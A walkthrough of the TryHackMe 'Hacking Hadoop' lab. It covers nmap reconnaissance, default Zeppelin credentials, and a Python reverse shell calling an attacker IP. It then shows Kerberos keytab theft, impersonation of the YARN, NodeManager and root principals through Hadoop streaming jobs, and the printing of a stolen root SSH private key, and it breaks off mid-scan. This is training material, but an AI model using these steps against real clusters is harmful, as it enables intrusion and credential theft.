Hacking Hadoop

Explanation on enumerating and exploiting Hadoop environment

In this blog we will understand how the Hadoop architecture can be exploited with an example of a TryHackMe room called Hacking Hadoop.

Connecting to the Datalake

This lab simulates a network through the use of Docker. To access this network, you will first have to configure your routing to enable you to see the network.

The lab lives in the 172.23.0.0/24 range. You will have to configure this route to the Hadoop network. First connect to the THM using the normal VPN file then after that download the openvpn file in the first task section, it will give us access to the internal Hadoop network.Then start the network, wait for 10 minutes after the lab has started for the cluster to become fully active.

The network infrastructure is as follows -

  • 172.23.0.3 - This is your primary target, an edge node in the Hadoop network.

  • 172.23.0.4 - In Hadoop terms, this is called the "master" node. Your final flag is here and root access signifies full Hadoop compromise.

  • 172.23.0.2 - This is the simulated Kerberos server. This server is out of scope for this challenge.

After that we need to add the target ip address to the hosts file

echo '10.10.215.96 thm_hadoop_network.net' >> /etc/hosts

Once this is done and you have given the lab some time to boot. After that try pinging 172.23.0.3 to see if the networking is working and responding. In this blog we will learn to compromising a datalake. Most large organisations out there have at least one datalake, some even more, and the most widely used datalake technology out there is Hadoop.

Hadoop Terminology

There are some key terms used in Hadoop that you should know to make this hacking journey easier. It should be noted that Hadoop still makes use of the terms master and slave, since primary and secondary already have specific meanings in the context of Hadoop.

  • Cluster - Refers to all the systems that together make the datalake.

  • Node - A single host or computer in the Hadoop cluster.

  • NameNode - A node that is responsible for keeping the directory tree of the Hadoop file system.

  • DataNode - A slave node that stores files according to the instructions of a NameNode.

  • Primary NameNode - The current active node responsible for keeping the directory structure.

  • Secondary NameNode - The backup node which will perform a seamless takeover of the directory structure should the Primary NameNode become unresponsive. There can be more than one Secondary NameNode in a cluster, but only one Primary active at any given time.

  • Master Node - Any node that is executing a Hadoop "management" application such as HDFS Manager or YARN Resource Manager.

  • Slave Node - Any node that runs a Hadoop "worker" application such as HDFS or MapReduce. It should be noted that a single node can be both a Master and Slave node at the same time.

  • Edge Node - Any node that is hosting a Hadoop "user" application such as Zeppelin or Hue. These are applications that users can use to perform processing on the data stored in the datalake.

  • Kerberised - The term given for a datalake that has security enabled through Kerberos.

What is Hadoop ?

Hadoop is a datalake technology developed by Apache. It is a collection of open-source applications and services that can utilise a network of computers to solve large and complex problems. Hadoop in its simplest form has two main functions namely distributed storage and distributed processing. In essence, it allows a network of computers to become one very large computer with a massive hard drive and a ton of CPU power. How big are we talking? Well, let's just put it this way, most organisations have clusters of about 200 nodes each with about 25 TeraBytes of storage equalling a staggering 5 PetaBytes of storage and roughly 1700 CPUs. To ensure network speed is not a bottleneck, usually, these nodes are connected to each other through multiple fibre lines. The world's largest cluster? 2000+ nodes with 21 PB of storage capacity and 22000+ CPUs. Below is an example architecture of a Hadoop ecosystem.

There are quite a number of different Apache Hadoop applications and services. These are some of the most common ones:

  • HDFS - Hadoop Distributed File System is the primary storage application for unstructured data such as files

  • Hive - Hive is the primary storage application for structured data. Think of it as a massive database.

  • YARN - Main resource manager application of Hadoop, used to schedule jobs in the cluster

  • MapReduce - Application executor of Hadoop to process vast amounts of data. It consists of a Map procedure, which performs filtering and sorting, and a reduce method, which performs a summary operation.

  • HUE - A user application that provides a GUI for HDFS and Hive.

  • Zookeeper - Provides operational services for the cluster to set the configuration of the cluster in question.

  • Spark - Engine for large-scale data processing.

  • Kafka - A message broker to build pipelines for real-time data processing.

  • Ranger - Used for the configuration of privilege access control over the resources in the datalake.

  • Zeppelin - A web-based notebook application for interactive data analytics.

All these applications are open-source, you can download the source code and spin it up in your own local machine, In this blog we are focusing on the primary applications such as HDFS and YARN. For many years security wasn't a thing in Hadoop. But over the years improvements are made. The two biggest security implementation are the authentication through Kerberos and PAM through optional such as Roger. In this blog, we will be looking at a Kerberised datalake, so there is some security, but common misconfigurations have led to this datalake being insecure.

The answers to the question in this section of the room can be found easily on the google !

All aboard the Hindenburg

Begin the recon on the ip - 172.23.0.3

root@kali ~/t/hadoop# nmap -sC -sV -O 172.23.0.3
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-12 00:47 EST
Nmap scan report for 172.23.0.3
Host is up (0.34s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
8031/tcp open  hadoop-ipc Hadoop IPC
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 404 Not Found
|     Content-type: text/plain
|_    looks like you are making an HTTP request to a Hadoop IPC port. This is not the correct port for the web interface on this daemon.
8042/tcp open  http       Jetty 6.1.26
| http-title:       
|_Requested resource was http://172.23.0.3:8042/node
|_http-server-header: Jetty(6.1.26)
8080/tcp open  http       Jetty 9.4.14.v20181114
|_http-title: Zeppelin
|_http-server-header: Jetty(9.4.14.v20181114)
8088/tcp open  http       Jetty 6.1.26
| http-title:     All Applications  
|_Requested resource was http://172.23.0.3:8088/cluster
|_http-server-header: Jetty(6.1.26)
9000/tcp open  hadoop-ipc Hadoop IPC
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 404 Not Found
|     Content-type: text/plain
Nmap done: 1 IP address (1 host up) scanned in 48.47 seconds

There are many ports open and services running. Visiting the web port 8080

The webpage is running Zeppelin that is used as web-notebook for data analytics. Now answering the questions in the section. Read the following link to get answers

https://zeppelin.apache.org/docs/0.6.2/security/shiroauthentication.html

1. What edge node service is running on this host?

  • Zeppelin

2. What file is responsible for the authentication configuration for this service?

  • shiro.ini

3. What is the username and password combination that gives you your initial entry?

  • user1:password2

4. Once authenticated, submit the flag that is hiding nicely in one of the notebooks.To get the flag authenticate with the credentials

Login

After that click on TestNode.

Got the first flag

Rocking it like Led

This application is a very popular Hadoop application. Similar to Jupyter notebooks, it allows data analysts to quickly writeup scripts that can pull, process, and display analytics from the data stored in the cluster. It does this by making use of interpreters, of which there are many to choose from. However, not all interpreters are equal. Similarly, not all user roles are equal. Task in the section is to compromise the target ip and get the flag inside the home directory of the user.

Answering the questions

  1. What is the password of the user allowed to interface with the interpreters and provided notebook?

From the previous TestNode, scroll down to see the password for user2

2. Which active interpreter can be used to execute code?

  • Python

3.What OS user does the application run as?

To know this we need to get a shell using the interpreter. First login to the user2 using the credentials we got.

Now we already know that the interpreter is running python. Using the below python reverse shell code, edit your machine ip and local port.

import socket,os,pty;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.8.0.2",1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
pty.spawn("/bin/sh")

Start a listener on port 1234

Press Shift+Enter to execute the code. Check the listener

We got a reverse shell as user zp.

You can stabalize the reverse shell for better interactivity, tutorial here

[zp@hadoop zeppelin]$ export SHELL=bash
[zp@hadoop zeppelin]$ export TERM=xterm-256color
[zp@hadoop zeppelin]$ stty rows 43 cols 158
[zp@hadoop zeppelin]$ whoami 
zp

4.What is the value of the flag found in the user's home directory (flag2.txt)?

The flag can be found on the home directory of user zp

[zp@hadoop ~]$ cat flag2.txt 
THM{It.Was.Hydrogen!}
[zp@hadoop ~]$ pwd
/home/zp

Keeping tabs on all these keys

After getting a stable reverse shell we got the access to the endpoint machine. But we do not have access to datalake because of Kerberos authentication. In hadoop there are many services running and each of them requires Kerberos before they can perform any action. Simple answer to this is automation and it is called Kerberos Keytabs.

Keytabs are magical things. Think of them as a Kerberos Key. Essentially, you are storing all the information required (including the password) to authenticate in a file. Keytabs can be generated by interfacing with the Kerberos server and executing the following command.

ktpass /pass <Krb Password> /mapuser <Krb Username>  /out <ex.keytab> /princ  <username>/<hostname>@<example.com> /ptype  KRB5_NT_PRINCIPAL /crypto RC4-HMAC-NT /Target example

The security of keytabs relies on restricting access to the associated keytab file. So file permissions should be used to protect the keytab file in question, similar to how SSH private keys are protected. However, by default, these keytab files do not inherit secure file permissions, especially during the initialisation phase when the datalake is created and these keys have to be distributed to each node in the cluster.

  1. Which directory stores the keytabs for the Hadoop services?

[zp@hadoop ~]$ find / -name *.keytab 2>/dev/null
/etc/security/keytabs/yarn.service.keytab
/etc/security/keytabs/nm.service.keytab
/etc/security/keytabs/jhs.service.keytab
/etc/security/keytabs/rm.service.keytab
/etc/security/keytabs/spnego.service.keytab
/etc/security/keytabs/dn.service.keytab
/etc/security/keytabs/root.service.keytab
/etc/security/keytabs/nn.service.keytab
/etc/security/keytabs/zp.service.keytab

Answer - /etc/security/keytabs

2. What is the keytab file's name associated with the compromised user?

Answer - zp.service.keytab

After finding the Keytabs, try to authenticate with Keberos and the keytab associated with our user. The following guide provides excellent assistance on using keytabs for authentication

https://kb.iu.edu/d/aumh

3. What is the first principal stored in this keytab file?

The klist command can be used to gather information from a keytab, since cat'ing the keytab usually ends badly for your shell. We can use the following command to output the principals stored in the keytab file

[zp@hadoop ~]$ klist -k /etc/security/keytabs/zp.service.keytab
Keytab name: FILE:/etc/security/keytabs/zp.service.keytab
KVNO Principal
---- --------------------------------------------------------------------------
   2 zp/hadoop.docker.com@EXAMPLE.COM
   2 zp/hadoop.docker.com@EXAMPLE.COM
   2 zp/hadoop.docker.com@EXAMPLE.COM
   2 zp/hadoop.docker.com@EXAMPLE.COM
   2 zp/hadoop.docker.com@EXAMPLE.COM
   2 zp/hadoop.docker.com@EXAMPLE.COM

Answer - zp.service.keytab

4. What is the full verbose command to authenticate with this keytab using the full file path?

The kinit command can be used to use a keytab, authenticate to the Kerberos server, and request a ticket. First navigate to /bin directory

[zp@hadoop bin]$ kinit zp/hadoop.docker.com@EXAMPLE.COM -k -V -t /etc/security/keytabs/zp.service.keytab
Using default cache: /tmp/krb5cc_507
Using principal: zp/hadoop.docker.com@EXAMPLE.COM
Using keytab: /etc/security/keytabs/zp.service.keytab
Authenticated to Kerberos v5

The -V flag is optional but it is really recommended adding it for additional verbosity, this helps in debugging.

Answer - kinit zp/hadoop.docker.com@EXAMPLE.COM -k -V -t /etc/security/keytabs/zp.service.keytab

5. What is the value of the flag stored in the compromised user's HDFS home directory (flag3.txt)?

Now after authentication is completed, we can start to interface with the datalake. However we can notice that we don't have access to CLI tools associated with Hadoop. Because the compromised user does not have the correct environment setup. All the tools for Hadoop services are located at /usr/local/hadoop/bin . Navigate there first. We need to interact with the HDFS application. Refer the guide

https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-hdfs/HDFSCommands.html

[zp@hadoop bin]$ pwd
/usr/local/hadoop/bin
[zp@hadoop bin]$ ls
container-executor  hadoop  hadoop.cmd  hdfs  hdfs.cmd  mapred  mapred.cmd  rcc  test-container-executor  yarn  yarn.cmd

The command that we are specifically interested in is the dfs command, which allows us to run file system commands on the datalake.

[zp@hadoop bin]$ ./hdfs dfs -ls /
22/03/12 07:21:35 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
Found 2 items
drwxrwxrwx   - root root          0 2021-10-15 10:52 /tmp
drwxr-xr-x   - root root          0 2022-03-12 05:18 /user

We can list the directories inside the datalake. There are two directories to be found. Navigating inside the /user directory and getting the flag

[zp@hadoop bin]$ ./hdfs dfs -ls /user
22/03/12 07:21:57 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
Found 9 items
drwxr-xr-x   - dn     hadoop_services          0 2021-10-15 10:53 /user/dn
drwxr-xr-x   - jhs    hadoop_services          0 2021-10-15 10:53 /user/jhs
drwxr-xr-x   - nm     hadoop_super             0 2022-03-12 05:18 /user/nm
drwxr-xr-x   - nn     hadoop_services          0 2021-10-15 10:53 /user/nn
drwxr-xr-x   - rm     hadoop_services          0 2021-10-15 10:53 /user/rm
drwxr-xr-x   - root   root                     0 2022-03-12 05:18 /user/root
drwxr-xr-x   - spnego hadoop_services          0 2021-10-15 10:53 /user/spnego
drwxr-xr-x   - yarn   hadoop_services          0 2022-03-12 05:18 /user/yarn
drwxr-xr-x   - zp     hadoop_services          0 2022-03-12 05:17 /user/zp
[zp@hadoop bin]$ ./hdfs dfs -ls /user/zp
22/03/12 07:22:21 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
Found 1 items
-rw-------   1 zp hadoop_services         50 2022-03-12 05:17 /user/zp/flag3.txt
[zp@hadoop bin]$ ./hdfs dfs -cat /user/zp/flag3.txt
22/03/12 07:22:46 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
THM{Now.We.Are.Talking.About.Distributed.Storage}

A great ball of YARN

After getting access to the datalake, we still have not performed privilege escalation. After authenticating to the datalake, things start to get interesting. You see, even though the datalake may look like a normal Unix file system, in terms of authentication and access control, things work a tad bit different when it comes to Hadoop. One key concept to understand is that your current OS user and your cluster user, DOES NOT have to correspond. Through Kerberos, the cluster will believe you are whoever you authenticate as, regardless of your actual OS user.

Often, the services in Hadoop has to perform impersonation to allow them to perform their duties. The HUE user may have to impersonate the HDFS user to create a new home directory. The Zeppelin user may have to impersonate the YARN user to schedule a job. YARN may impersonate the NodeManager to allocate processes to different nodes.

YARN may impersonate the NodeManager to allocate processes to different nodes. The secure way of configuring this is to copy keytabs and restrict them down with granular file permissions to only the services that require them. But lazy admins sometimes skips this crucial time because of the complexity and workload.

So what organisations usually do is they just chmod the hell (666) out of these keys until the services can impersonate as they deem fit. In our case, our organisation at least tried to perform some key segregation by using group permissions, but it is honestly not that much more secure.

  1. What is the name of the service we will attempt to impersonate for privilege escalation?

Answer - YARN

2. What is the value of the flag in the impersonated user's HDFS home directory (flag4.txt)? Using the same techniques from the previous section we can get the flag from the HDFS home directory

[zp@hadoop bin]$ klist -k /etc/security/keytabs/yarn.service.keytab 
Keytab name: FILE:/etc/security/keytabs/yarn.service.keytab
KVNO Principal
---- --------------------------------------------------------------------------
   2 yarn/hadoop.docker.com@EXAMPLE.COM
   2 yarn/hadoop.docker.com@EXAMPLE.COM
   2 yarn/hadoop.docker.com@EXAMPLE.COM
   2 yarn/hadoop.docker.com@EXAMPLE.COM
   2 yarn/hadoop.docker.com@EXAMPLE.COM
   2 yarn/hadoop.docker.com@EXAMPLE.COM

Now we can use the principle above to authenticate to the kerberos server.

[zp@hadoop bin]$ kinit yarn/hadoop.docker.com@EXAMPLE.COM -k -V -t /etc/security/keytabs/yarn.service.keytab 
Using default cache: /tmp/krb5cc_507
Using principal: yarn/hadoop.docker.com@EXAMPLE.COM
Using keytab: /etc/security/keytabs/yarn.service.keytab
Authenticated to Kerberos v5

Using the hdfs binary to interact with the HDFS user.

[zp@hadoop bin]$ ./hdfs dfs -ls /user/yarn
22/03/12 09:28:43 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
Found 1 items
-rw-------   1 yarn hadoop_services         28 2022-03-12 05:18 /user/yarn/flag4.txt

3. What is the value of the flag in the impersonated user's OS home directory (flag5.txt)?

HDFS impersonation is cool and all because we can now access the home directories of other users, but from an OS perspective, we are still the low-privileged user. We need to find some way to abuse the permissions of this impersonated service to also become this user on an OS level. Enter MapReduce. Certain Hadoop services, our impersonated service being one of them, have the ability to ask the datalake to execute processes on their behalf. The interesting thing is, these jobs will be executed from the context of the user associated with the job. We can abuse this to perform RCERefer the below GitHub page to perform RCE.

https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Tools%20Techniques%20and%20Procedures/Executing%20remote%20commands

First creating txt file.

[zp@hadoop bin]$ ./hdfs dfs -touchz /tmp/text.txt
22/03/12 09:35:25 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable

Now execute the below command to read the flag for HDFS user and redirect the output to it to the /tmp directory. For clear explanation of the command refer the above post to understand the logic behind it.

[zp@hadoop bin]$ ./hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/text.txt -output /tmp/flag -mapper "cat /home/yarn/flag5.txt" -reducer NONE
22/03/12 09:41:35 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
packageJobJar: [/tmp/hadoop-unjar6549812581536747546/] [] /tmp/streamjob5689524998558489075.jar tmpDir=null
22/03/12 09:41:36 INFO client.RMProxy: Connecting to ResourceManager at /0.0.0.0:8032
22/03/12 09:41:36 INFO client.RMProxy: Connecting to ResourceManager at /0.0.0.0:8032
...
...
	Map-Reduce Framework
		Map input records=0
		Map output records=1
		Input split bytes=94
		Spilled Records=0
		Failed Shuffles=0
		Merged Map outputs=0
		GC time elapsed (ms)=73
		CPU time spent (ms)=900
		Physical memory (bytes) snapshot=167104512
		Virtual memory (bytes) snapshot=1939415040
		Total committed heap usage (bytes)=91750400
	File Input Format Counters 
		Bytes Read=0
	File Output Format Counters 
		Bytes Written=40
22/03/12 09:41:53 INFO streaming.StreamJob: Output directory: /tmp/flag

Now the output the flag is redirected the random filename created in /tmp/flag. Check and read the flag.

[zp@hadoop bin]$ ./hdfs dfs -ls /tmp/flag
22/03/12 09:42:05 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
Found 2 items
-rw-r--r--   1 yarn root          0 2022-03-12 09:41 /tmp/flag/_SUCCESS
-rw-r--r--   1 yarn root         40 2022-03-12 09:41 /tmp/flag/part-00000
[zp@hadoop bin]$ ./hdfs dfs -cat /tmp/flag/part-00000
22/03/12 09:42:25 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
THM{Little.Kitty.Got.Its.Ball.Of.Yarn}

Assistant to the regional Node

After impersonating there is one peculiar keytab remaining. This keytab belongs to the NodeManager service. This is not a service mentioned at the start since this is a service that you normally never interact with directly.

Essentially, behind the scenes, this service ensures that all nodes are up and running. If a node becomes unhealthy, the NodeManager will inform the relevant services like ResourceManager to distribute the load of that node onto others in order to improve the node's health or get it ready for retirement.

It is usually behind the scenes, as organisations usually make use of what's called Datalake management solutions. These are applications like Ambari or Cloudera manager. These applications provide a centralised platform that helps control, manage, and deploy your cluster. However, they are usually just wrapping the NodeManager and ResourceManager services.

With all of this being said, if you want to ever control the entire cluster, this would be the service to hunt for. We will impersonate the NodeManager service from both datalake and OS perspective.

  1. What is the value of the flag associated with the NodeManager's HDFS home directory (flag6.txt)?

We will follow the same methodology as before to impersonate NodeManger but we as a low-privilege user do not have permission to use the NodeManager keytab. First creating a bash script that will copy the NodeManager keytab to /tmp directory and give the executable permission.

echo -e '#!/bin/bash' > /tmp/evil.sh
echo -e 'cp /etc/security/keytabs/nm.service.keytab /tmp/nm.service.keytab' >> /tmp/evil.sh
echo -e 'chmod 777 /tmp/nm.service.keytab' >> /tmp/evil.sh
chmod +x /tmp/evil.sh

After this we will use the same command as before to run the evil.sh script that will do the work.

[zp@hadoop bin]$ ./hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/text.txt -output /tmp/node -mapper "/tmp/evil.sh" -file /tmp/evil.sh -reducer NONE
22/03/12 09:58:51 WARN streaming.StreamJob: -file option is deprecated, please use generic option -files instead.
22/03/12 09:58:51 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
packageJobJar: [/tmp/evil.sh, /tmp/hadoop-unjar4615029854440937598/] [] /tmp/streamjob1657540646974650546.jar tmpDir=null
22/03/12 09:58:52 INFO client.RMProxy: Connecting to ResourceManager at /0.0.0.0:8032
22/03/12 09:58:52 INFO client.RMProxy: Connecting to ResourceManager at /0.0.0.0:8032
22/03/12 09:58:52 INFO hdfs.DFSClient: Created HDFS_DELEGATION_TOKEN token 5 for yarn on 172.23.0.3:9000
22/03/12 09:58:52 INFO security.TokenCache: Got dt for hdfs://hadoop.docker.com:9000; Kind: HDFS_DELEGATION_TOKEN, Service: 172.23.0.3:9000, Ident: (HDFS_DELEGATION_TOKEN token 5 for yarn)
22/03/12 09:58:53 INFO mapred.FileInputFormat: Total input paths to process : 1
22/03/12 09:58:53 INFO mapreduce.JobSubmitter: number of splits:1
22/03/12 09:58:53 INFO mapreduce.JobSubmitter: Submitting tokens for job: job_1647062258512_0005
successfully
22/03/12 09:59:09 INFO mapreduce.Job: Counters: 30
	File System Counters
		FILE: Number of bytes read=0
		FILE: Number of bytes written=130197
...
...
		Total committed heap usage (bytes)=93323264
	File Input Format Counters 
		Bytes Read=0
	File Output Format Counters 
		Bytes Written=0
22/03/12 09:59:09 INFO streaming.StreamJob: Output directory: /tmp/node

Now that we have access to NodeManager keytab. We will use to authenticate then impersonate it to read the flag.

[zp@hadoop bin]$ klist -k /tmp/nm.service.keytab
Keytab name: FILE:/tmp/nm.service.keytab
KVNO Principal
---- --------------------------------------------------------------------------
   2 nm/hadoop.docker.com@EXAMPLE.COM
   2 nm/hadoop.docker.com@EXAMPLE.COM
   2 nm/hadoop.docker.com@EXAMPLE.COM
   2 nm/hadoop.docker.com@EXAMPLE.COM
   2 nm/hadoop.docker.com@EXAMPLE.COM
   2 nm/hadoop.docker.com@EXAMPLE.COM
[zp@hadoop bin]$ 
[zp@hadoop bin]$ kinit nm/hadoop.docker.com@EXAMPLE.COM -k -V -t /tmp/nm.service.keytab
Using default cache: /tmp/krb5cc_507
Using principal: nm/hadoop.docker.com@EXAMPLE.COM
Using keytab: /tmp/nm.service.keytab
Authenticated to Kerberos v5
[zp@hadoop bin]$ 
[zp@hadoop bin]$ ./hdfs dfs -cat /user/nm/flag6.txt
22/03/12 10:00:08 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
THM{Regional.Assistant.Manager}
[zp@hadoop bin]$

2. What is the value of the flag associated with the NodeManager's OS home directory (flag7.txt)?

Using the same methodology to read the flag in the NodeManager's OS directory. Creating a bash script that will read the flag. Give the executable permissions to the scritp too.

echo -e '#!/bin/bash' > /tmp/flag7.sh
echo -e 'cat /home/nm/flag7.txt' >> /tmp/flag7.sh

Now execute the same command to impersonate, read the flag and redirect the output.

[zp@hadoop bin]$ ./hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/text.txt -output /tmp/node2 -mapper "/tmp/flag7.sh" -file /tmp/flag7.sh -reducer NONE
22/03/12 10:06:08 WARN streaming.StreamJob: -file option is deprecated, please use generic option -files instead.
22/03/12 10:06:08 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
packageJobJar: [/tmp/flag7.sh, /tmp/hadoop-unjar4238222037514121569/] [] /tmp/streamjob464330926517905157.jar tmpDir=null
22/03/12 10:06:10 INFO client.RMProxy: Connecting to ResourceManager at /0.0.0.0:8032
22/03/12 10:06:10 INFO client.RMProxy: Connecting to ResourceManager at /0.0.0.0:8032
22/03/12 10:06:10 INFO hdfs.DFSClient: Created HDFS_DELEGATION_TOKEN token 6 for nm on 172.23.0.3:9000
...
...
	File Input Format Counters 
		Bytes Read=0
	File Output Format Counters 
		Bytes Written=41
22/03/12 10:06:27 INFO streaming.StreamJob: Output directory: /tmp/node2

After this read the flag.

[zp@hadoop bin]$ ./hdfs dfs -cat /tmp/node2/part-00000
22/03/12 10:07:28 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
THM{Assistance.To.The.Regional.Manager}

I❤️root

Now after impersonating every other user and services. It's time to target the root user. The methodology is same as above.

  1. What is the value of the flag in the root user's home directory (flag8.txt)?

Like before creating a bash script that will copy the flag in root directory to tmp directory and give read permission to all users to read.

echo -e '#!/bin/bash' > /tmp/root.sh
echo -e 'sudo cp /root/flag8.txt /tmp/root.txt' >> /tmp/root.sh
echo -e 'sudo chmod 777 /tmp/root.txt' >> /tmp/root.sh

After this using the same command as above.

./hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/text.txt -output /tmp/root -mapper "/tmp/root.sh" -file /tmp/root.sh -reducer NONE

Then reading the flag.

[zp@hadoop bin]$ cat /tmp/root.txt 
THM{This.Has.Got.To.Be.The.Saddest.Root.Privesc.Ever}

2. What is the value of the flag in the root user's HDFS home directory (flag9.txt)? Now to get the root flag inside HDFS home directory, we need to impersonate the root user. Creating a bash script that will copy the root service keytab to the tmp directory. Give the executable permissions

echo -e '#!/bin/bash' > /tmp/evil3.sh
echo -e 'sudo cp /etc/security/keytabs/root.service.keytab /tmp/root.service.keytab' >> /tmp/evil3.sh
echo -e 'sudo chmod 777 /tmp/root.service.keytab' >> /tmp/evil3.sh

Now execute the command to run the script.

./hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/text.txt -output /tmp/root2 -mapper "/tmp/evil3.sh" -file /tmp/evil3.sh -reducer NONE

After this use the root keytab to authenticate to Kerberos.

[zp@hadoop bin]$ klist -k /tmp/root.service.keytab
Keytab name: FILE:/tmp/root.service.keytab
KVNO Principal
---- --------------------------------------------------------------------------
   2 root@EXAMPLE.COM
   2 root@EXAMPLE.COM
   2 root@EXAMPLE.COM
   2 root@EXAMPLE.COM
   2 root@EXAMPLE.COM
   2 root@EXAMPLE.COM 
[zp@hadoop bin]$ kinit root@EXAMPLE.COM -k -V -t /tmp/root.service.keytab
Using default cache: /tmp/krb5cc_507
Using principal: root@EXAMPLE.COM
Using keytab: /tmp/root.service.keytab
Authenticated to Kerberos v5

Now you can read the flag.

[zp@hadoop bin]$ ./hdfs dfs -cat flag9.txt
22/03/12 10:19:18 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
THM{Nothing.Can.Stop.You.Now!}

Surfing the datalake

Now after impersonating, we can actually gain root ssh access using the very same method.

  1. What is the value of the flag in the root user's directory on the secondary cluster node (flag10.txt)?

Creating a bash script that will copy the root user ssh id_rsa to the /tmp directory. Also giving the executable permissions

echo -e '#!/bin/bash' > /tmp/evil2.sh
echo -e 'sudo cp /root/.ssh/id_rsa /tmp/id_rsa_stolen' >> /tmp/evil2.sh
echo -e 'sudo chmod 777 /tmp/id_rsa_stolen' >> /tmp/evil2.sh

First authenticate with the keytab for root user we got in the previous task.

kinit nm/hadoop.docker.com@EXAMPLE.COM -k -V -t /tmp/nm.service.keytab

Now use the command from before to execute the script.

./hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/text.txt -output /tmp/root3 -mapper "/tmp/evil2.sh" -file /tmp/evil2.sh -reducer NONE

Confirm the id_rsa we got.

[zp@hadoop bin]$ cat /tmp/id_rsa_stolen 
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEA0PctY54xz7K48R8mK7MdkRovognpe8sUVvSWepgN2xZv+zwn
Cbynzmi+cVEhOZ1ymAOzOO+FWM03rSucNiuQPorF7rgtjh5RrL/RmWdO4Ah4k6ol
mxOXYMEtAewQBc5/4BCOLFupqNd1XnIx8CadYyachef3qkdXcXqMbCoS+xD4IrhD
V9+oMgBguTWaHoFzOBTD4D764nhrR7pbuEddqZZY50iq3iRMYFRDOSEqCw7TIyoa
khyw4MLpCpI7IJvK6g5SyF2jlF31etBTZy+uKk+n6wME3ApKUsL6dtupBKRcj37O
lFfPcFn9AWxmY5BX61M0XGwvGUm7e51Bu6ZDGQIBIwKCAQEAuRVxWDuodiH0Q0d5
lGtx9Yw40Vk8g5ac/I999439pMq69HcbQyNwDpdJl5EAK7dW3mmtXlB9a+j2zJRX
KKo97kBmKzVqLWtPp6KVEtfYJYPYgsnmyy6cBT1iYMnFDHUSLNt2nFEv3rA0wV3U
dZ6LZnKn5FEdMGsS73sr6sYuEZEUnLJMCWtzDV2UOPJeugDKASjmkFQXFdzeyCtx
tzZv230bwW9qH8WvXA2ITPtAXuZG0YbAn2t9Swu/FEXsQCAiRz8SBVcPj36aqSUP
Yv+L3uyWMrgBkiIUk+52GB5IHFnBCBz2W9AXXs38mcDOx7uF/gp2VGMu4ozz4IcR
+KKuiwKBgQD8aTCKL7PpOoWz4OQDE8Rk6uqG5AKRLo325+vnjdzY8NhjHpQ226hT
luqaop78FcAwoWoXEUcwjzJ9GHVuzvChimSt5zzLH186WAYOxtqn7R8gKQugwQQ6
hZq5YZKoVPHoMAlzWBzl/be2f5pSPuB7I9GJO6s7GiKMlNYtpIjhoQKBgQDT79cx
wrJunhEFfz/ySUBLQ5j2m1lX5Y38+a3rhNp6C0E5izapnIxDUPdIgaiSs3PvdCff
tBHR04tq671WOtE0OIN3wlMyPlcEQsm3Yhu65qmLmTgoho0A046i+g4KHBNQHH3y
gf1jtQQIR9dcOuyomCuIoHIBIGcCyD8YkwreeQKBgHqZffn56avL98xl6xdwAE5G
N2YW+e6+1z1pVVM2RrKDnE1mn8LfuCiZwmhdna2kKiY/xdCwnuuzRGilet4MvgVR
2SFEbfxCcBUGLtP6L7CmX5NHIueuNUD/EKMvZH2lmhGw7qW9FVnEYIvXlBlRvX2j
rurid72e+taRb1f/da9rAoGBAKN+gW+HkPY/bDdwyu4bQDoPk0HljhCbJGQRESNm
fKdKgsX9rdNM4Ts+dZ5VZMjw1cdZmxpJFQ+UkB9IJFh2hCD4ZWsDn0QENH+hPIYn
HLTAkWuwtksl977PFkM17ZLFM3hQfmqeyslCf3QaKcrOXsszj0wkACzBOYXNrQRU
LPTDAoGAFWNcNeQCSK2/KyBJWHpVB5bcBuv6bVBG9+j53wR0JFUEYdINbNs+EFqx
3bB1k2M+XVyPRLCNhyPb8qYo2kwTixDpscF3GyjAGl7oF2EtnDrMpwdGdZ3Oj4FW
Ck3bvaKJ8me9pW+E9N8j1kE7cdghTduH0sPMMm5V1s9tvKF14WY=
-----END RSA PRIVATE KEY-----

We have the id-rsa for the root user on machine 172.23.0.4. Perform a nmap scan to find the ssh service running on non-default service.

root@kali ~/t/hadoop# nmap -p- 172.23.0.4 --min-rate 1000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-12 05:34 EST
Stats: 0:01:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
